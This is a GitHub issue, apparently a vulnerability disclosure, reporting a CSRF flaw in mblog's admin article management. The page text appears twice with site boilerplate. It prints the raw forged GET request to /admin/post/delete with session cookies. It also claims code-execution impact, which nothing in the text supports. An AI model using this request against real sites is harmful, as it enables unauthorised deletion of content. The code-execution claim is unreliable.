We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
There is a CSRF vulnerability in the background article management. The attacker constructs a CSRF load. Once the administrator clicks a malicious link, the article will be deleted. [Vulnerability Type] Cross-site request forgery (csrf) [Vendor of Product] https://github.com/langhsu/mblog [Affected Component] GET /admin/post/delete?id=6 HTTP/1.1 Host: 127.0.0.1:8082 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:8082/admin/post/list Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_acc69acbc4e6d4c69ecf77725d072490=1628653260; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1629356854,1629356969; Hm_lvt_1040d081eea13b44d84a4af639640d51=1629787797; UM_distinctid=17b76ec38b042b-043bd40aca20f-3373266-e1000-17b76ec38b13f6; CNZZDATA1255091723=1621369374-1629783007-http%253A%252F%252F127.0.0.1%253A8080%252F%7C1629783007; JSESSIONID=BcGdm-4poQD-nImmtzQx_gevDCZGrfxbmnirm5hb Connection: close [Attack Type] Remote
[Impact Code execution] true POC:
The text was updated successfully, but these errors were encountered:
No branches or pull requests
There is a CSRF vulnerability in the background article management. The attacker constructs a CSRF load.
Once the administrator clicks a malicious link, the article will be deleted.
[Vulnerability Type]
Cross-site request forgery (csrf)
[Vendor of Product]
https://github.com/langhsu/mblog
[Affected Component]
GET /admin/post/delete?id=6 HTTP/1.1
Host: 127.0.0.1:8082
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8082/admin/post/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_acc69acbc4e6d4c69ecf77725d072490=1628653260; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1629356854,1629356969; Hm_lvt_1040d081eea13b44d84a4af639640d51=1629787797; UM_distinctid=17b76ec38b042b-043bd40aca20f-3373266-e1000-17b76ec38b13f6; CNZZDATA1255091723=1621369374-1629783007-http%253A%252F%252F127.0.0.1%253A8080%252F%7C1629783007; JSESSIONID=BcGdm-4poQD-nImmtzQx_gevDCZGrfxbmnirm5hb
Connection: close
[Attack Type]
Remote
[Impact Code execution]
true
POC:
The text was updated successfully, but these errors were encountered: